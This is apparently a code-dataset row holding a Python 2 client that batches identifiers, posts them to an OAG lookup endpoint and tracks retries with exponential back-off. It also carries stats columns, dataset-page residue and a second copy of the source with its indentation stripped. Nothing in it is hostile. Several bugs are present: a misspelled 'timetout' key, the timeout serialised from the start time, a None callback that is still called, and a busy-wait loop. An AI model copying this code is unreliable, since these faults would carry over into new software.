state.back_off_factor = j.get("back_off_factor")
state.max_back_off = j.get("max_back_off")
state.batch_size = j.get("batch_size")
if j.get("max_retries"):
state.max_retries = j.get("max_retries")
for s in j.get("success", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.success[s.get("id")] = obj
for s in j.get("error", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.error[s.get("id")] = obj
for s in j.get("pending", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["due"] = datetime.strptime(obj["due"], cls._timestamp_format)
state.pending[s.get("id")] = obj
for s in j.get("maxed", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
state.maxed[s.get("id")] = obj
return state
def json(self):
data = {}
data["id"] = self.id
data["start"] = datetime.strftime(self.start, self._timestamp_format)
if self.timeout is not None:
data["timeout"] = datetime.strftime(self.start, self._timestamp_format)
data["back_off_factor"] = self.back_off_factor
data["max_back_off"] = self.max_back_off
if self.max_retries is not None:
data["max_retries"] = self.max_retries
data["batch_size"] = self.batch_size
data["success"] = []
for k in self.success:
obj = {"id" : k}
obj.update(self.success[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["success"].append(obj)
data["error"] = []
for k in self.error:
obj = {"id" : k}
obj.update(self.error[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["error"].append(obj)
data["pending"] = []
for k in self.pending:
obj = {"id" : k}
obj.update(self.pending[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["due"] = datetime.strftime(obj["due"], self._timestamp_format)
data["pending"].append(obj)
data["maxed"] = []
for k in self.maxed:
obj = {"id" : k}
obj.update(self.maxed[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
data["maxed"].append(obj)
return data
def _backoff(self, times):
now = datetime.utcnow()
seconds = 2**times * self.back_off_factor
seconds = seconds if seconds < self.max_back_off else self.max_back_off
return now + timedelta(seconds=seconds)
class OAGClient(object):
    """Thin client for the OAG lookup endpoint: batches identifiers, posts
    them, and folds the responses back into a RequestState."""
    def __init__(self, lookup_url=None):
        # Fall back to the configured lookup URL when none is supplied.
        self.lookup_url = lookup_url if lookup_url is not None else app.config.get("OAG_LOOKUP_URL")
    def cycle(self, state, throttle=0, verbose=False):
        """Request all currently-due identifiers in batches, sleeping
        *throttle* seconds between batches, and record outcomes on *state*."""
        due = state.get_due()
        batches = self._batch(due, state.batch_size)
        if verbose:
            print str(len(due)) + " due; requesting in " + str(len(batches)) + " batches"
        first = True
        i = 1
        print "Processing batch ",
        for batch in batches:
            if first:
                first = False
            elif throttle > 0:
                time.sleep(throttle)
            # first try and get the result - this could result in an HTTP error, and we
            # don't want that to kill the thread. If it fails, record a request against the
            # identifier but leave it pending
            result = None
            recorded = False
            try:
                result = self._query(batch)
            except requests.exceptions.HTTPError as e:
                # record the records in this batch as requested once more
                state.record_requested(batch)
                recorded = True
            # if we get a result, then record it. Otherwise, again record the batch as requested
            # but leave it in pending.
            if result is not None:
                state.record_result(result)
            else:
                # record the records in this batch as requested once more
                # (skipped if the HTTPError branch already counted this attempt)
                if not recorded:
                    state.record_requested(batch)
            print i,
            sys.stdout.flush()
            i += 1
        print ""
        return state
    def _batch(self, ids, batch_size=1000):
        """Split *ids* into consecutive lists of at most *batch_size*."""
        batches = []
        start = 0
        while True:
            batch = ids[start:start + batch_size]
            if len(batch) == 0: break
            batches.append(batch)
            start += batch_size
        return batches
    def _query(self, batch, retries=10):
        """POST one batch as JSON; return the parsed response, None if the
        request could not be made, or raise on a non-OK status."""
        data = json.dumps(batch)
        resp = http.post(self.lookup_url, retries=retries, headers={'Accept':'application/json'}, data=data)
        if resp is None:
            return None
        elif resp.status_code == requests.codes.ok:
            return resp.json()
        else:
            resp.raise_for_status()
def oag_it(lookup_url, identifiers,
timeout=None, back_off_factor=1, max_back_off=120, max_retries=None, batch_size=1000,
verbose=True, throttle=5,
callback=None, save_state=None):
state = RequestState(identifiers, timeout=timeout, back_off_factor=back_off_factor, max_back_off=max_back_off, max_retries=max_retries, batch_size=batch_size)
client = OAGClient(lookup_url)
if verbose:
print "Making requests to " + lookup_url + " for " + str(len(identifiers)) + " identifiers"
print state.print_parameters()
print state.print_status_report()
next = state.next_due()
while True:
# check whether we're supposed to do anything yet
now = datetime.utcnow()
if now < next:
continue
# if a cycle is due, issue it
client.cycle(state, throttle, verbose)
if verbose:
print state.print_status_report()
# run the callback on the state
if callback is not None:
callback("cycle", state)
# run the save method if there is one
if save_state is not None:
save_state(state)
# if we are finished, break
if state.finished():
callback("finished", state)
print "FINISHED"
break
# if we have done work here, update the next due time for the busy
# loop aboge
next = state.next_due()
print "Next request is due at", datetime.strftime(next, "%Y-%m-%d %H:%M:%S")
| 36.628571 | 162 | 0.569501 | from datetime import datetime, timedelta
import json, requests, time, sys, uuid
from copy import deepcopy
from octopus.core import app
from octopus.lib import http
class RequestState(object):
_timestamp_format = "%Y-%m-%dT%H:%M:%SZ"
def __init__(self, identifiers, timeout=None, back_off_factor=None, max_back_off=None, max_retries=None, batch_size=None, start=None):
self.id = uuid.uuid4().hex
self.success = {}
self.error = {}
self.pending = {}
self.maxed = {}
self.success_buffer = []
self.error_buffer = []
self.start = datetime.utcnow() if start is None else start
if timeout is None:
timeout = app.config.get("OAG_STATE_DEFAULT_TIMEOUT")
self.timeout = self.start + timedelta(seconds=timeout) if timeout is not None else None
if back_off_factor is None:
back_off_factor = app.config.get("OAG_STATE_BACK_OFF_FACTOR", 1)
self.back_off_factor = back_off_factor
if max_back_off is None:
max_back_off = app.config.get("OAG_STATE_MAX_BACK_OFF", 120)
self.max_back_off = max_back_off
if max_retries is None:
max_retries = app.config.get("OAG_STATE_MAX_RETRIES", None)
self.max_retries = max_retries
if batch_size is None:
batch_size = app.config.get("OAG_STATE_BATCH_SIZE", 1000)
self.batch_size = batch_size
for ident in identifiers:
self.pending[ident] = {"init" : self.start, "due" : self.start, "requested" : 0}
def print_parameters(self):
params = "Timeout: " + str(self.timeout) + "\n"
params += "Back Off Factor: " + str(self.back_off_factor) + "\n"
params += "Max Back Off: " + str(self.max_back_off) + "\n"
params += "Max Tries per Identifier: " + str(self.max_retries) + "\n"
params += "Batch Size: " + str(self.batch_size)
return params
def print_status_report(self):
status = str(len(self.success.keys())) + " received; " + \
str(len(self.error.keys())) + " errors; " + \
str(len(self.pending.keys())) + " pending; " + \
str(len(self.maxed.keys())) + " maxed"
return status
def finished(self):
if len(self.pending.keys()) == 0:
return True
if self.timeout is not None:
if datetime.utcnow() > self.timeout:
return True
return False
def get_due(self):
now = datetime.utcnow()
return [p for p in self.pending.keys() if self.pending[p].get("due") < now]
def next_due(self):
earliest = None
for p, o in self.pending.iteritems():
if earliest is None or o.get("due") < earliest:
earliest = o.get("due")
return earliest
def _record_maxed(self, id):
self.maxed[id] = self.pending[id]
del self.pending[id]
if "due" in self.maxed[id]:
del self.maxed[id]["due"]
def record_requested(self, identifiers):
for id in identifiers:
if id in self.pending:
self.pending[id]["requested"] += 1
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
else:
print "ERROR: id {id} is not in the pending list".format(id=id)
def record_result(self, result):
now = datetime.utcnow()
successes = result.get("results", [])
errors = result.get("errors", [])
processing = result.get("processing", [])
for s in successes:
id = s.get("identifier")[0].get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.success[id] = deepcopy(ourrecord)
self.success[id]["requested"] += 1
self.success[id]["found"] = now
del self.success[id]["due"]
del self.pending[id]
self.success_buffer.extend(successes)
for e in errors:
id = e.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "No record of pending id " + id
continue
self.error[id] = deepcopy(ourrecord)
self.error[id]["requested"] += 1
self.error[id]["found"] = now
del self.error[id]["due"]
del self.pending[id]
self.error_buffer.extend(errors)
for p in processing:
id = p.get("identifier").get("id")
ourrecord = self.pending.get(id)
if ourrecord is None:
print "ERROR: No record of pending id " + id
continue
self.pending[id]["requested"] += 1
self.pending[id]["due"] = self._backoff(self.pending[id]["requested"])
if self.max_retries is not None and self.pending[id]["requested"] >= self.max_retries:
self._record_maxed(id)
def flush_success(self):
buffer = self.success_buffer
self.success_buffer = []
return buffer
def flush_error(self):
buffer = self.error_buffer
self.error_buffer = []
return buffer
@classmethod
def from_json(cls, j):
state = RequestState([])
state.id = j.get("id")
if j.get("timetout"):
state.timeout = datetime.strptime(j.get("timeout"), cls._timestamp_format)
state.start = datetime.strptime(j.get("start"), cls._timestamp_format)
state.back_off_factor = j.get("back_off_factor")
state.max_back_off = j.get("max_back_off")
state.batch_size = j.get("batch_size")
if j.get("max_retries"):
state.max_retries = j.get("max_retries")
for s in j.get("success", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.success[s.get("id")] = obj
for s in j.get("error", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["found"] = datetime.strptime(obj["found"], cls._timestamp_format)
state.error[s.get("id")] = obj
for s in j.get("pending", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
obj["due"] = datetime.strptime(obj["due"], cls._timestamp_format)
state.pending[s.get("id")] = obj
for s in j.get("maxed", []):
obj = deepcopy(s)
obj["init"] = datetime.strptime(obj["init"], cls._timestamp_format)
state.maxed[s.get("id")] = obj
return state
def json(self):
data = {}
data["id"] = self.id
data["start"] = datetime.strftime(self.start, self._timestamp_format)
if self.timeout is not None:
data["timeout"] = datetime.strftime(self.start, self._timestamp_format)
data["back_off_factor"] = self.back_off_factor
data["max_back_off"] = self.max_back_off
if self.max_retries is not None:
data["max_retries"] = self.max_retries
data["batch_size"] = self.batch_size
data["success"] = []
for k in self.success:
obj = {"id" : k}
obj.update(self.success[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["success"].append(obj)
data["error"] = []
for k in self.error:
obj = {"id" : k}
obj.update(self.error[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["found"] = datetime.strftime(obj["found"], self._timestamp_format)
data["error"].append(obj)
data["pending"] = []
for k in self.pending:
obj = {"id" : k}
obj.update(self.pending[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
obj["due"] = datetime.strftime(obj["due"], self._timestamp_format)
data["pending"].append(obj)
data["maxed"] = []
for k in self.maxed:
obj = {"id" : k}
obj.update(self.maxed[k])
obj["init"] = datetime.strftime(obj["init"], self._timestamp_format)
data["maxed"].append(obj)
return data
def _backoff(self, times):
now = datetime.utcnow()
seconds = 2**times * self.back_off_factor
seconds = seconds if seconds < self.max_back_off else self.max_back_off
return now + timedelta(seconds=seconds)
class OAGClient(object):
def __init__(self, lookup_url=None):
self.lookup_url = lookup_url if lookup_url is not None else app.config.get("OAG_LOOKUP_URL")
def cycle(self, state, throttle=0, verbose=False):
due = state.get_due()
batches = self._batch(due, state.batch_size)
if verbose:
print str(len(due)) + " due; requesting in " + str(len(batches)) + " batches"
first = True
i = 1
print "Processing batch ",
for batch in batches:
if first:
first = False
elif throttle > 0:
time.sleep(throttle)
# identifier but leave it pending
result = None
recorded = False
try:
result = self._query(batch)
except requests.exceptions.HTTPError as e:
# record the records in this batch as requested once more
state.record_requested(batch)
recorded = True
# if we get a result, then record it. Otherwise, again record the batch as requested
# but leave it in pending.
if result is not None:
state.record_result(result)
else:
# record the records in this batch as requested once more
if not recorded:
state.record_requested(batch)
print i,
sys.stdout.flush()
i += 1
print ""
return state
def _batch(self, ids, batch_size=1000):
batches = []
start = 0
while True:
batch = ids[start:start + batch_size]
if len(batch) == 0: break
batches.append(batch)
start += batch_size
return batches
def _query(self, batch, retries=10):
data = json.dumps(batch)
resp = http.post(self.lookup_url, retries=retries, headers={'Accept':'application/json'}, data=data)
if resp is None:
return None
elif resp.status_code == requests.codes.ok:
return resp.json()
else:
resp.raise_for_status()
def oag_it(lookup_url, identifiers,
timeout=None, back_off_factor=1, max_back_off=120, max_retries=None, batch_size=1000,
verbose=True, throttle=5,
callback=None, save_state=None):
state = RequestState(identifiers, timeout=timeout, back_off_factor=back_off_factor, max_back_off=max_back_off, max_retries=max_retries, batch_size=batch_size)
client = OAGClient(lookup_url)
if verbose:
print "Making requests to " + lookup_url + " for " + str(len(identifiers)) + " identifiers"
print state.print_parameters()
print state.print_status_report()
next = state.next_due()
while True:
# check whether we're supposed to do anything yet
now = datetime.utcnow()
if now < next:
continue
client.cycle(state, throttle, verbose)
if verbose:
print state.print_status_report()
if callback is not None:
callback("cycle", state)
if save_state is not None:
save_state(state)
if state.finished():
callback("finished", state)
print "FINISHED"
break
next = state.next_due()
print "Next request is due at", datetime.strftime(next, "%Y-%m-%d %H:%M:%S")
| false | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.